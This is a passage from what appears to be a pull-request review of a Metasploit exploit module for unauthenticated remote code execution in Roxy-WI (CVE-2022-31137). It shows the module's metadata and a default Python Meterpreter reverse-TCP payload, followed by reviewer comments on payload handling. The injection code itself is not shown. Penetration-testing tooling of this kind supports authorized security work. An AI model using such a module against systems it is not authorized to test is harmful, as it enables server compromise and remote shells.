modules/exploits/linux/http/roxy-wi_exec.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Roxy-WI Unauthenticated Remote Code Execution",
+      'Description'    => %q{
+        This module exploits command injection vulnerability to achieve remote code execution.
+        Unauthenticated users can execute a terminal command under the context of the web server user
+        
+        Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. In versions 6.1.1.0 and earlier,
+        an unauthenticated user can execute some methods of administrator fun without needing any credentials.
+        Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account,
+        or execute operating system command under the context of the web-server user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nuri Çilengir <nuri@prodaft.com>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/'],
+          ['CVE', 'CVE-2022-31137']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'RPORT' => 443,
+          'WfsDelay' => 25,
+        },
+      'Platform'       => ['python', 'unix'],
+      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      'Targets'        =>
+        [
+          ['Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'DefaultOptions' => {'PAYLOAD'  => 'python/meterpreter/reverse_tcp'}
+            }
+          ],
```

Comment:
This isn't necessary any more. You should be able to delete the whole definition and the conversion down on L106/107 in favor of the user just specifying `cmd/unix/python/meterpreter/reverse_tcp` ad their payload. Metasploit will handle the conversion automatically into a command in a similar manner to what you're already doing. This is a relatively new feature.

IIRC if you remove the `DefaultOptions` below the Python Meterpreter will actually be selected automatically.

Reply:
Thx ! Done at  [d23c175](https://github.com/rapid7/metasploit-framework/pull/16793/commits/d23c175f28f229838e90622cae1e1f758fd2aab7)

Reply:
This isn't quite appropriately fixed. Will be reviewing this code and making some recommendations r.e this.

Reply:
This has since been fixed with more recent code updates.